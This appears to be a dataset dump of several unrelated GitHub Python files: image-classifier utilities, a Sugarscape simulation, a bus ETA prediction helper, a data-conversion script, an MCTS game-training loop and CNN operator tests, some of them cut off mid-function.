class_cnt),\n 1: total / (positive_cnt * class_cnt)\n }\n \n return class_weights\n \n \ndef create_dataframe(train_dir):\n \"\"\"\n Collects all files in a dataset folder into a DataFrame and labels them according to which subfolder (class) they belong to.\n \n Parameters\n ----------\n train_dir : str\n Path to folder which is to be turned into a DataFrame.\n \n Returns\n -------\n train_df : pandas.DataFrame\n Shuffled dataframe with all the files of given directory. 
Files are identified by the column 'path' and their label by the column 'label'.\n \"\"\"\n train_df = pd.DataFrame(columns=['path', 'label'])\n labels = ['negative', 'positive']\n for l in labels:\n paths = os.listdir(os.path.join(train_dir, l))\n train_df = train_df.append([pd.Series({'path': os.path.join(l, i), 'label': l}) for i in paths], ignore_index=True)\n return train_df.sample(frac=1)\n \n\ndef get_crossval_generators(datagen, train_dir, train_data, valid_data, img_size=224, batch_size=32, channel_cnt=3, shuffle=True, rand_seed=111):\n \"\"\"\n Creates data sources from a given image data generator, which are then used in training and validating a model. These sources use data indexed by two DataFrames\n and are meant to be applied in the K-fold cross-validation pipeline.\n \n Parameters\n ----------\n datagen : TensorFlow.keras.preprocessing.image.ImageDataGenerator\n Image data generator based on which the sources will be created.\n train_dir : str\n Path to folder containing training images.\n train_data : pandas.DataFrame\n Dataframe containing paths and labels of training data.\n valid_data : pandas.DataFrame\n Dataframe containing paths and labels of validation data.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n channel_cnt : int\n Number of channels in the input images. The count determines whether rgb or grayscale mode will be used. Default value: 3.\n shuffle : bool\n Wheteher to shuffle the order of the images when generating them. Default value: True.\n rand_seed : int\n Random seed for the shuffling. Default value: 111.\n \n Returns\n -------\n train_gen, valid_gen : TensorFlow.keras.preprocessing.image.DirectoryIterator\n Iterators, which yield tuples of (x, y) where x is a NumPy array containing a batch of images and y is a NumPy array of their corresponding labels.\n \"\"\"\n if channel_cnt == 3:\n mode = 'rgb'\n elif channel_cnt == 1:\n mode = 'grayscale'\n else:\n raise ValueError(f'The target number of channels in the images must be either 1 (grayscale) or 3 (rgb)')\n \n train_gen = datagen.flow_from_dataframe(\n dataframe=train_data,\n directory=train_dir,\n x_col='path',\n y_col='label',\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n\n valid_gen = datagen.flow_from_dataframe(\n dataframe=valid_data,\n directory=train_dir,\n x_col='path',\n y_col='label',\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n color_mode=mode,\n shuffle=shuffle,\n seed=rand_seed\n )\n \n return train_gen, valid_gen\n \n\ndef oversampling(train_dir, img_size=224, batch_size=32, ratio=1, augment=True):\n \"\"\"\n Oversample the minority class to perform class balancing in the training data. If augment is set to True, the re-added images will first be augmented.\n \n Parameters\n ----------\n train_dir : str\n Path to the training directory.\n img_size : int\n Target size of the images. Default value: 224.\n batch_size : int\n Batch size, which will be yielded by the generators in each call. Default value: 32.\n ratio : float\n Approximate ratio of the classes after the balancing is performed. 
Default value: 1.\n augment : bool\n Whether to perform augmentations on the oversampled images.\n \"\"\"\n \n print(f\"Before oversampling, the positive class has { len(os.listdir(os.path.join(train_dir, 'positive'))) } samples\")\n \n source_dir = './sample_pool'\n if os.path.exists(source_dir):\n shutil.rmtree(source_dir)\n shutil.copytree(os.path.join(train_dir, 'positive'), os.path.join(source_dir, 'positive'))\n\n if augment:\n datagen = ImageDataGenerator(\n #Choose data augmentation parameters\n rotation_range=10,\n width_shift_range=0.03,\n height_shift_range=0.05,\n horizontal_flip=False,\n brightness_range=(0.9, 1.1),\n zoom_range=(0.9, 1.1),\n fill_mode='constant',\n cval=0.\n )\n else:\n datagen = ImageDataGenerator()\n \n oversampler = datagen.flow_from_directory(\n directory=source_dir,\n target_size=(img_size, img_size),\n batch_size=batch_size,\n class_mode='binary',\n save_to_dir=os.path.join(train_dir, 'positive'),\n save_prefix='new_',\n color_mode='rgb',\n shuffle=True,\n seed=111\n )\n\n negative_cnt = len(os.listdir(os.path.join(train_dir, 'negative')))\n while len(os.listdir(os.path.join(train_dir, 'positive'))) < (negative_cnt / ratio):\n oversampler.next()\n\n print(f\"After oversampling the positive class, it now contains {len(os.listdir(os.path.join(train_dir, 'positive')))} samples\")\n\n\n@tf.function\ndef f1_metric(y_true, y_pred):\n \"\"\"\n Function to calculate the F1 metric during continuous training of a TensorFlow model.\n Original source: # https://datascience.stackexchange.com/a/48251\n \n Parameters\n ----------\n y_true : NumPy.ndarray\n Ground truth labels of the evaluated batch.\n y_pred : NumPy.ndarray\n Predicted class of the evaluated batch.\n \n Returns\n -------\n f1_val : float\n F1 score for the positive class.\n \"\"\"\n \n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\n precision = true_positives / (predicted_positives + K.epsilon())\n recall = true_positives / (possible_positives + K.epsilon())\n f1_val = 2*(precision*recall)/(precision+recall+K.epsilon())\n return f1_val","repo_name":"chododom/COVID-19-Detection","sub_path":"src/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":15354,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"70268190921","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nimport thinkplot\nfrom Cell2D import Cell2D, Cell2DViewer\nfrom SugarAgent import Agent\nfrom thinkstats2 import Cdf\nfrom thinkstats2 import RandomSeed\n\n\ndef make_locs(n, m):\n \"\"\"Makes array where each row is an index in an `n` by `m` grid.\n\n n: int number of rows\n m: int number of cols\n\n returns: NumPy array\n \"\"\"\n t = [(i, j) for i in range(n) for j in range(m)]\n return np.array(t)\n\n\ndef make_visible_locs(vision):\n \"\"\"Computes the kernel of visible cells.\n\n vision: int distance\n \"\"\"\n\n def make_array(d):\n \"\"\"Generates visible cells with increasing distance.\"\"\"\n a = np.array([[-d, 0], [d, 0], [0, -d], [0, d]])\n np.random.shuffle(a)\n return a\n\n arrays = [make_array(d) for d in range(1, vision + 1)]\n return np.vstack(arrays)\n\n\ndef distances_from(n, i, j):\n \"\"\"Computes an array of distances.\n\n n: size of the array\n i, j: coordinates to find distance from\n\n returns: array of float\n \"\"\"\n X, Y = np.indices((n, n))\n return np.hypot(X - i, Y - j)\n\n\nclass 
Sugarscape(Cell2D):\n \"\"\"Represents an Epstein-Axtell Sugarscape.\"\"\"\n\n def __init__(self, n, **params):\n \"\"\"Initializes the attributes.\n\n n: number of rows and columns\n params: dictionary of parameters\n \"\"\"\n self.n = n\n self.params = params\n\n # track variables\n self.agent_count_seq = []\n\n # make the capacity array\n self.capacity = self.make_capacity()\n\n # initially all cells are at capacity\n self.array = self.capacity.copy()\n\n # make the agents\n self.make_agents()\n\n def make_capacity(self):\n \"\"\"Makes the capacity array.\"\"\"\n\n # compute the distance of each cell from the peaks.\n dist1 = distances_from(self.n, 15, 15)\n dist2 = distances_from(self.n, 35, 35)\n dist = np.minimum(dist1, dist2)\n\n # cells in the capacity array are set according to dist from peak\n bins = [21, 16, 11, 6]\n a = np.digitize(dist, bins)\n return a\n\n def make_agents(self):\n \"\"\"Makes the agents.\"\"\"\n\n # determine where the agents start and generate locations\n n, m = self.params.get('starting_box', self.array.shape)\n locs = make_locs(n, m)\n np.random.shuffle(locs)\n\n # make the agents\n num_agents = self.params.get('num_agents', 400)\n assert (num_agents <= len(locs))\n self.agents = [Agent(locs[i], self.params)\n for i in range(num_agents)]\n\n # keep track of which cells are occupied\n self.occupied = set(agent.loc for agent in self.agents)\n\n def grow(self):\n \"\"\"Adds sugar to all cells and caps them by capacity.\"\"\"\n grow_rate = self.params.get('grow_rate', 1)\n self.array = np.minimum(self.array + grow_rate, self.capacity)\n\n def look_and_move(self, center, vision):\n \"\"\"Finds the visible cell with the most sugar.\n\n center: tuple, coordinates of the center cell\n vision: int, maximum visible distance\n\n returns: tuple, coordinates of best cell\n \"\"\"\n # find all visible cells\n locs = make_visible_locs(vision)\n locs = (locs + center) % self.n\n\n # convert rows of the array to tuples\n locs = [tuple(loc) for loc in locs]\n\n # select unoccupied cells\n empty_locs = [loc for loc in locs if loc not in self.occupied]\n\n # if all visible cells are occupied, stay put\n if len(empty_locs) == 0:\n return center\n\n # look up the sugar level in each cell\n t = [self.array[loc] for loc in empty_locs]\n\n # find the best one and return it\n # (in case of tie, argmax returns the first, which\n # is the closest)\n i = np.argmax(t)\n return empty_locs[i]\n\n def harvest(self, loc):\n \"\"\"Removes and returns the sugar from `loc`.\n\n loc: tuple coordinates\n \"\"\"\n sugar = self.array[loc]\n self.array[loc] = 0\n return sugar\n\n def step(self):\n \"\"\"Executes one time step.\"\"\"\n replace = self.params.get('replace', False)\n\n # loop through the agents in random order\n random_order = np.random.permutation(self.agents)\n for agent in random_order:\n\n # mark the current cell unoccupied\n self.occupied.remove(agent.loc)\n\n # execute one step\n agent.step(self)\n\n # if the agent is dead, remove from the list\n if agent.is_starving() or agent.is_old():\n self.agents.remove(agent)\n if replace:\n self.add_agent()\n else:\n # otherwise mark its cell occupied\n self.occupied.add(agent.loc)\n\n # update the time series\n self.agent_count_seq.append(len(self.agents))\n\n # grow back some sugar\n self.grow()\n return len(self.agents)\n\n def add_agent(self):\n \"\"\"Generates a new random agent.\n\n returns: new Agent\n \"\"\"\n new_agent = Agent(self.random_loc(), self.params)\n self.agents.append(new_agent)\n self.occupied.add(new_agent.loc)\n 
return new_agent\n\n def random_loc(self):\n \"\"\"Choose a random unoccupied cell.\n\n returns: tuple coordinates\n \"\"\"\n while True:\n loc = tuple(np.random.randint(self.n, size=2))\n if loc not in self.occupied:\n return loc\n\n\nclass SugarscapeViewer(Cell2DViewer):\n \"\"\"Generates visualization and animation of Sugarscape.\"\"\"\n\n cmap = plt.get_cmap('YlOrRd')\n\n options = dict(interpolation='none', alpha=0.8,\n vmin=0, vmax=9)\n\n def draw(self, grid=False):\n \"\"\"Draws the array and any other elements.\n\n grid: boolean, whether to draw grid lines\n \"\"\"\n self.draw_array(self.viewee.array, origin='lower')\n self.draw_agents()\n\n def draw_agents(self):\n \"\"\"Plots the agents.\n \"\"\"\n xs, ys = self.get_coords()\n self.points = plt.plot(xs, ys, '.', color='red')[0]\n\n def animate_func(self, i):\n \"\"\"Draws one frame of the animation.\"\"\"\n Cell2DViewer.animate_func(self, i)\n xs, ys = self.get_coords()\n self.points.set_data(np.array([xs, ys]))\n return self.im, self.points\n\n def get_coords(self):\n \"\"\"Gets the coordinates of the agents.\n\n Transforms from (row, col) to (x, y).\n\n returns: tuple of sequences, (xs, ys)\n \"\"\"\n agents = self.viewee.agents\n rows, cols = np.transpose([agent.loc for agent in agents])\n xs = cols + 0.5\n ys = rows + 0.5\n return xs, ys\n\n\nif __name__ == '__main__':\n # a = make_locs(2, 3)\n # b = make_visible_locs(2)\n # c = distances_from(5, 2, 2)\n\n env = Sugarscape(50, num_agents=1500)\n viewer = SugarscapeViewer(env)\n # anim = viewer.animate(frames=2, interval=10)\n anim = viewer.animate(frames=2)\n plt.show()\n\n # # # First implementation\n #\n # cdf = Cdf(agent.vision for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Vision', ylabel='CDF')\n #\n # cdf = Cdf(agent.metabolism for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Metabolism', ylabel='CDF')\n #\n # cdf = Cdf(agent.sugar for agent in env.agents)\n # thinkplot.Cdf(cdf)\n # thinkplot.Config(xlabel='Sugar', ylabel='CDF')\n #\n # env.step()\n # # viewer = SugarscapeViewer(env)\n # viewer.draw()\n\n # anim = viewer.animate(frames=500)\n # plt.show()\n\n # # # Second implementation\n # RandomSeed(17)\n #\n # env = Sugarscape(50, num_agents=400)\n # viewer = SugarscapeViewer(env)\n #\n # thinkplot.preplot(cols=3)\n # viewer.draw()\n #\n # thinkplot.subplot(2)\n # for i in range(2):\n # viewer.step()\n # viewer.draw()\n #\n # thinkplot.subplot(3)\n # for i in range(98):\n # viewer.step()\n # viewer.draw()\n #\n # thinkplot.tight_layout()\n # thinkplot.save('chap09-3')\n","repo_name":"BAFurtado/Python4ABMIpea2019","sub_path":"Sugarscape.py","file_name":"Sugarscape.py","file_ext":"py","file_size_in_byte":8110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"40151205347","text":"# @Time : 2017/10/24 16:19\n# @Author : Jalin Hu\n# @File : note.py\n# @Software: PyCharm\nimport matplotlib.pyplot as plt\nimport math\nx = []\ny = []\nfor i in range(-20, 21):\n x.append(i)\nf = lambda x: 1 / (1 + math.e ** (-2 * x))\nfor i in map(f, x):\n print(i)\n y.append(i)\nplt.figure()\nplt.plot(x, y)\nplt.show()\n","repo_name":"smallsmallcase/Logistic_regression","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21201624087","text":"# Standard library imports\nimport sys, 
os\nsys.path.append(os.path.abspath('../../configuration'))\nimport pickle\n# Third party imports\nimport sklearn\nimport sklearn.ensemble\n# Local imports\nimport routeInfo as ri\nimport preprocess as pre\nimport getData as gd\n\ndef applyModel(data: list, route: str, model: str) -> int:\n    \"\"\"\n    :param: data, route, model (ml)\n    :return: Predicted ETA for specific vehicle\n    :usage: Generate a prediction from the chosen ml model\n\t\"\"\"\n    model = pickle.load(open(f'src/models/{route}/{model}', 'rb'))\n    prediction = model.predict(data)\n    return int(prediction[0])\n\ndef generatePrediction(routes: list = None, model: str = None) -> dict:\n    \"\"\"\n    :param: routes, model (ml)\n    :return: JSON of relevant information\n    :usage: Generate and list all predictions to be returned by the api\n    Return schema: {routeID: {busID: [prediction, nextStop], busID: [prediction, nextStop]}, routeID: {busID: [prediction, nextStop], busID: [prediction, nextStop]}}\n    \"\"\"\n    predictions = {}\n    if routes:\n        temp = []\n        for key, value in ri.allRoutes.items():\n            if value in routes:\n                temp.append(key)\n        routes = temp\n        del temp\n    else:\n        routes = ri.chosenRoutes\n    for route in routes:\n        busPredictions = {}\n        vehicles = gd.getVehicleData(route)\n        for vehicleData in vehicles:\n            nextStop = vehicleData[4]\n            latitude = vehicleData[5]\n            longitude = vehicleData[6]\n            trafficData = gd.getTrafficData(latitude, longitude)\n            weatherData = gd.getWeatherData(latitude, longitude)\n            distanceData = gd.getDistance(route, nextStop, latitude, longitude)\n            raw = vehicleData + trafficData + weatherData + distanceData\n            processedData = [pre.processData(raw)]\n            busPredictions[vehicleData[1]] = [applyModel(processedData, ri.allRoutes[route], model), ri.routeMap[route][nextStop]['name']]\n        predictions[ri.allRoutes[route]] = busPredictions\n    return predictions\n\ndef returnRaw(routes: list = None) -> dict:\n    \"\"\"\n    :param: routes\n    :return: JSON of raw data used to train and generate predictions\n    :usage: Return compiled data\n    Return schema: {routeID: {busID: [data], busID: [data]}, routeID: {busID: [data], {busID: [data]}}}\n    data = ['Time', 'Call_name', 'Speed', 'Passenger_load', 'Next_stop', 'Latitude', 'Longitude', 'Heading', 'Traffic_speed', 'Temperature', 'Windspeed', 'Precipitation', 'Humidity', 'Visibility', 'Stop_distance']\n    \"\"\"\n    rawData = {}\n    if routes:\n        temp = []\n        for key, value in ri.allRoutes.items():\n            if value in routes:\n                temp.append(key)\n        routes = temp\n        del temp\n    else:\n        routes = ri.chosenRoutes\n    for route in routes:\n        temp = {}\n        vehicles = gd.getVehicleData(route)\n        for vehicleData in vehicles:\n            nextStop = vehicleData[4]\n            latitude = vehicleData[5]\n            longitude = vehicleData[6]\n            trafficData = gd.getTrafficData(latitude, longitude)\n            weatherData = gd.getWeatherData(latitude, longitude)\n            distanceData = gd.getDistance(route, nextStop, latitude, longitude)\n            raw = vehicleData + trafficData + weatherData + distanceData\n            temp[vehicleData[1]] = raw\n        rawData[ri.allRoutes[route]] = temp\n    return rawData\n","repo_name":"brandonliau/RuTransloc","sub_path":"src/tools/apiSupport.py","file_name":"apiSupport.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"31566834153","text":"import sys\r\nfrom collections import deque\r\n\r\ninput = sys.stdin.readline\r\n\r\nv = int(input())\r\nvortex = [[] for _ in range(v + 1)]\r\nvs = [True] * (v + 1)\r\n\r\nfor i in range(1, v + 1):\r\n    connect = 
list(map(int, input().split()))\r\n    index = i\r\n    j = 1\r\n    while connect[j] > 0:\r\n        a, b = connect[j], connect[j + 1]\r\n        vortex[index].append((a, b))\r\n        vs[a] = False\r\n        j += 2\r\n\r\n\r\ndef dfs(start):\r\n    stack = deque([(start, 0)])\r\n    visited = [False] * (v + 1)\r\n    \r\n","repo_name":"JCH1410/BOJ","sub_path":"1167_G2_temp.py","file_name":"1167_G2_temp.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"70275278920","text":"\"\"\"Usage: convert_data.py\n\nConvert downloaded csv data to correctly readable data\n\nOptions:\n  -h, --help            show this help message and exit\n\"\"\"\nimport os\nimport json\nimport csv\nfrom stringutil import StringUtil\n\nfrom natsort import natsorted\n\nfrom converter import Processor, FILETYPE\n\n\ndef delete_total_csvs(outdir: str):\n    \"\"\"delete csv files in the outdir\n\n    Args:\n        outdir (str): the dir that has the target csv files\n    \"\"\"\n    for filetype in FILETYPE:\n        filename = \"{0}/{1}.csv\".format(outdir, filetype.value)\n        if (os.path.exists(filename)):\n            os.remove(filename)\n\n\nif __name__ == \"__main__\":\n    RAW_DIR = './data/raw'\n    OUT_DIR = './data/out'\n    # DATA FILE\n    DATA_FILE = \"./data/loaded_files.json\"\n\n    # If data file does not exist, finish process\n    if (not os.path.exists(DATA_FILE)):\n        print(\n            'Error: data file {0} does not exist. Run download.py first'\n            .format(DATA_FILE))\n        exit(1)\n\n    # load data file\n    with open(DATA_FILE) as f:\n        loaded: dict = json.load(f)\n\n    # create dir if it does not exist\n    if (not os.path.exists(OUT_DIR)):\n        os.makedirs(OUT_DIR)\n\n    # delete total files\n    delete_total_csvs(OUT_DIR + \"/total\")\n\n    # load csv data\n    for key in loaded.keys():\n        date = StringUtil.extract_date_from_title(loaded.get(key))\n        if (not date):\n            print('The system could not retrieve date string from the title \"{0}\" '\n                  .format(\n                      loaded.get(key)))\n            continue\n        ymd = date.strftime('%Y%m%d')\n        processor = Processor(date)  # create processor instance\n        print('Create file for the date {0}'.format(date))\n        target_dir = RAW_DIR + '/' + key\n        print('Scan {0}'.format(target_dir))\n        if (not os.path.exists(target_dir)):\n            print(\n                'The data for the key {0} does not exist. 
Skip this key'\n .format(key))\n continue\n\n # read all csv file of the raw data\n for csvfile in natsorted(os.listdir(target_dir)):\n l: list = []\n with open(target_dir + '/' + csvfile) as f:\n reader = csv.reader(f)\n for row in reader:\n l.append(list(map(StringUtil.to_number, row)))\n processor.appendData(l)\n # save extended data\n if (key == list(loaded.keys())[-1]):\n # last file data as latest data\n print('save CSVs to {0}'.format(OUT_DIR + \"/\" + \"latest\"))\n processor.saveFiles(OUT_DIR + \"/\" + \"latest\")\n else:\n print('save CSVs to {0}'.format(OUT_DIR + \"/\" + ymd))\n processor.saveFiles(OUT_DIR + \"/\" + ymd)\n","repo_name":"codeforjapan/mynumbercard_statistics","sub_path":"mynumbercard_data/convert_data.py","file_name":"convert_data.py","file_ext":"py","file_size_in_byte":2727,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"63"} +{"seq_id":"37473014288","text":"import random\nimport resource\nfrom typing import Any, List, Tuple\n\nimport numpy as np\nimport torch\nfrom torch.multiprocessing import Pool\n\nfrom engine.landshark_game import GameState\nfrom search.mcts import MCTS\n\nnp.random.seed(1)\ntorch.manual_seed(1)\n\ntorch.multiprocessing.set_sharing_strategy(\"file_system\")\n\n\nclass Policy(torch.nn.Module):\n def __init__(self, feature_dim: int, action_dim: int, num_players: int):\n super().__init__()\n self.feature_dim = feature_dim\n self.action_dim = action_dim\n self.num_players = num_players\n self.shared = torch.nn.ModuleList(\n [\n torch.nn.BatchNorm1d(feature_dim),\n (torch.nn.Linear(feature_dim, 128)),\n torch.nn.LeakyReLU(),\n torch.nn.BatchNorm1d(128),\n (torch.nn.Linear(128, 64)),\n torch.nn.LeakyReLU(),\n torch.nn.BatchNorm1d(64),\n ]\n )\n\n self.critic = torch.nn.ModuleList(\n [torch.nn.Linear(64, num_players), torch.nn.Softmax(dim=1)]\n )\n\n self.actor = torch.nn.ModuleList(\n [torch.nn.Linear(64, action_dim), torch.nn.Softmax(dim=1)]\n )\n\n self.critic_criterion = torch.nn.NLLLoss()\n\n self.optimizer = torch.optim.Adam(\n list(self.shared.parameters())\n + list(self.critic.parameters())\n + list(self.actor.parameters()),\n lr=0.001,\n )\n\n def forward(self, features: torch.Tensor):\n x = features\n for m in self.shared:\n x = m(x)\n head = x\n for m in self.critic:\n x = m(x)\n critic_output = x\n x = head\n for m in self.actor:\n x = m(x)\n actor_output = x\n return critic_output, actor_output\n\n def fit(self, features, payoffs, probabilities):\n previous_loss = None\n stale_count = 0\n for x in range(100000):\n self.optimizer.zero_grad()\n critic_output, actor_output = self(features.detach())\n\n critic_loss = self.critic_criterion(\n torch.log(critic_output.clamp(min=1e-3)), payoffs.flatten()\n )\n actor_loss = (\n -(probabilities * torch.log(actor_output.clamp(min=1e-3)))\n .sum(dim=1)\n .mean()\n )\n print(actor_output)\n print(probabilities)\n\n total_loss = critic_loss + actor_loss\n if x % 1 == 0:\n print(\n f\"Critic: {critic_loss} Actor: {actor_loss} Total Loss: {total_loss} Previous loss: {previous_loss}\"\n )\n assert torch.isnan(actor_loss).sum() == 0\n assert torch.isnan(critic_loss).sum() == 0\n total_loss.backward()\n if x > 0 and total_loss + 1e-4 > previous_loss:\n stale_count += 1\n if stale_count >= 3:\n break\n else:\n stale_count = 0\n previous_loss = float(total_loss)\n self.optimizer.step()\n self.optimizer.zero_grad()\n\n\ndef one_mcts(game, policy):\n np.random.seed(random.SystemRandom().randint(0, 1000000))\n torch.manual_seed(random.SystemRandom().randint(0, 
1000000))\n    features = []\n    payoffs = []\n    probabilities = []\n    mcts = MCTS(policy)\n    game.reset()\n\n    partial_training_examples = []\n    episodeStep = 0\n\n    with torch.no_grad():\n        while True:\n            episodeStep += 1\n\n            # game.print()\n            if game.get_player_to_act() == 0 and False:\n                print(\"Possible Actions: \" + str(game.getPossibleActions()))\n                action_str = input(\n                    \"Please give an action for seat \"\n                    + str(game.get_player_to_act())\n                    + \": \"\n                )\n                action = int(action_str)\n                game.playerAction(game.get_player_to_act(), action)\n            else:\n                pi = mcts.getActionProb(game, num_sims=1000, temp=1)\n                game_features = torch.zeros(game.feature_dim())\n                game.populate_features(game_features)\n                partial_training_examples.append(\n                    [game_features, game.get_player_to_act(), pi, None]\n                )\n\n                action = np.random.choice(len(pi), p=pi)\n                board = game.act(game.get_player_to_act(), action)\n\n            if game.terminal():\n                game_payoffs = game.payoffs()\n                game_payoffs = (game_payoffs == int(game_payoffs.max().item())).long()\n                for pte in partial_training_examples:\n                    features.append(pte[0])\n                    ego_centric_payoffs = torch.roll(game_payoffs, pte[1], dims=[0])\n                    winner_index = torch.nonzero(ego_centric_payoffs, as_tuple=False)[0]\n                    payoffs.append(winner_index)\n                    probabilities.append(torch.tensor(pte[2]))\n                # print(payoffs)\n                # print(probabilities)\n                break\n    return (features, payoffs, probabilities)\n\n\ngame = GameState(4)\nfeatures = []\npayoffs = []\nprobabilities = []\npolicy = None\nstep = 128\nmilestone = step\nmcts_pool = Pool(32)\nfor x in range(100):\n    results: List[Tuple[Any, Any, Any]] = mcts_pool.starmap(\n        one_mcts, [(game, policy)] * 64\n    )\n    # f, pa, pr = one_mcts(game, policy)\n    for f, pa, pr in results:\n        features.extend(f)\n        payoffs.extend(pa)\n        probabilities.extend(pr)\n\n    while len(features) >= milestone:\n        milestone += step\n        if policy is None:\n            policy = Policy(game.feature_dim(), game.action_dim(), game.num_players)\n            policy.eval()\n        policy.train()\n        policy.fit(\n            torch.stack(features), torch.stack(payoffs), torch.stack(probabilities)\n        )\n        features.clear()\n        payoffs.clear()\n        probabilities.clear()\n        policy.eval()\n        torch.save(policy, \"MCTS_AC.torch\")\n","repo_name":"MisterTea/LandsharkGame","sub_path":"backend/search/test_mcts_landshark.py","file_name":"test_mcts_landshark.py","file_ext":"py","file_size_in_byte":6053,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"}
{"seq_id":"21375094121","text":"import cnn_operator as cnn_opt\r\nimport torch\r\nimport torchvision as tv\r\nimport torch.nn as nn\r\n\r\nimport math\r\nimport numpy as np\r\nimport os,sys\r\nif __name__ == '__main__':\r\n\r\n# #CONV operator\r\n# conv_fm_in_shape = [1, 11 ,176, 176] #input feature map ====shape: [ batch, in_height, in_weight, in_channel ]===\r\n# conv_kernel_shape = [10, 11, 5, 5] #conv kernel params ====shape: [ out_channels,in_channel, filter_height, filter_weight]==\r\n# conv_stride_info = [1, 1, 7, 7] #stride params ====shape: [ 1, 1, row_strides, col_strides]\r\n# conv_dilation_info = [1, 1, 3, 3]\r\n# conv_padding_info = [13,13]\r\n# # cnn_opt.cnn_operator_conv(conv_fm_in_shape,conv_kernel_shape,conv_stride_info,conv_dilation_info,conv_padding_info)\r\n#\r\n# act_fm_in_shape = [1, 3, 256, 256, ] # input feature map ====shape: [ batch, in_channel, in_height, in_weight]===\r\n# act_prelu_para_init= np.float32(0.28)\r\n# # act_prelu_para_init= torch.double(0.28) #.float64(0.28)\r\n# act_layer_leakyrelu_para= np.float32(1e-2)\r\n# fm_in = (torch.randn(tuple(act_fm_in_shape))*6)\r\n#\r\n# act_layer_relu = 
nn.ReLU(inplace=False)\r\n# act_layer_prelu = nn.PReLU(act_fm_in_shape[1], act_prelu_para_init) # a参数可学习 max(0,x) + a * min(0,x)\r\n# act_layer_leakyrelu = nn.LeakyReLU(act_layer_leakyrelu_para, inplace=False)\r\n# act_layer_relu6 = nn.ReLU6(inplace=False)\r\n# act_layer_sigmoid = nn.Sigmoid() # 1 / ( 1 + e^{-x}\r\n# act_layer_Tanh = nn.Tanh()\r\n#\r\n# fm_out_relu = act_layer_relu.forward(fm_in)\r\n# fm_out_prelu = act_layer_prelu.forward(fm_in)\r\n# fm_out_leakyrelu = act_layer_leakyrelu.forward(fm_in)\r\n# fm_out_relu6 = act_layer_relu6.forward(fm_in)\r\n# fm_out_sigmoid = act_layer_sigmoid.forward(fm_in)\r\n# fm_out_Tanh = act_layer_Tanh.forward(fm_in)\r\n#\r\n# dir = 'inout'\r\n# if not os.path.exists(dir):\r\n# os.mkdir(dir)\r\n#\r\n# np.savetxt(dir + '/act_fm_in.txt' , fm_in.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_relu.txt' , fm_out_relu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_prelu.txt' , fm_out_prelu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_leakyrelu.txt' , fm_out_leakyrelu.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_relu6.txt' , fm_out_relu6.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_sigmoid.txt' , fm_out_sigmoid.detach().numpy().reshape(-1, 1))\r\n# np.savetxt(dir + '/act_fm_out_Tanh.txt' , fm_out_Tanh.detach().numpy().reshape(-1, 1))\r\n#\r\n# print(\"==================================================\")\r\n# print(\"=the ACT process done DB have saved in the file=\")\r\n# print(\"==================================================\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n#POOL operator\r\n pool_mode = \"AVG\"\r\n pool_fm_in_shape = [1, 3, 256, 256, ] # 输入特征图 ====shape为 [ batch, in_channel, in_height, in_weight]===\r\n pool_kernel_info = [1, 1, 2, 2]\r\n pool_stride_info = [1, 1, 7, 7]\r\n pool_dilation_info = [1, 1, 3, 3]\r\n pool_padding_info = [1, 1]\r\n # cnn_opt.cnn_operator_pool(pool_fm_in_shape,pool_kernel_info,pool_stride_info,pool_dilation_info,pool_padding_info,pool_mode)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n# FC operator\r\n batch_size = 10\r\n fm_in_node_num = 20\r\n fm_out_node_num = 30\r\n # cnn_opt.cnn_operator_fc(batch_size, fm_in_node_num, fm_out_node_num)\r\n\r\n# Batch-Normlize operator\r\n# fm_in = np.array(np.arange(1,101,1),dtype='d')\r\n\r\n BN_fm_in_shape = [10,3, 64, 64]\r\n num_feature = BN_fm_in_shape[1]\r\n fm_in = np.array(np.random.randn(BN_fm_in_shape[0],BN_fm_in_shape[1],BN_fm_in_shape[2],BN_fm_in_shape[3]), dtype='d')\r\n # fm_in_tmp = fm_in.reshape((BN_fm_in_shape[0],BN_fm_in_shape[1],BN_fm_in_shape[2],BN_fm_in_shape[3]))\r\n BN_fm_in = torch.from_numpy(fm_in)\r\n # BN_fm_in_shape = [16, 3, 32, 32] #输入特征图 ====shape为 [ batch, in_height, in_weight, in_channel ]===\r\n\r\n ##== Without Learnable Parameters\r\n gamma = np.float64(1)\r\n beta = np.float64(0)\r\n eps = np.float64(0)\r\n momentum = np.float64(1)\r\n BN_layer = nn.BatchNorm2d(num_feature,eps=eps,momentum=momentum,affine=False)\r\n BN_layer.running_mean.data=BN_layer.running_mean.data.to(torch.float64) #torch dataformat change\r\n 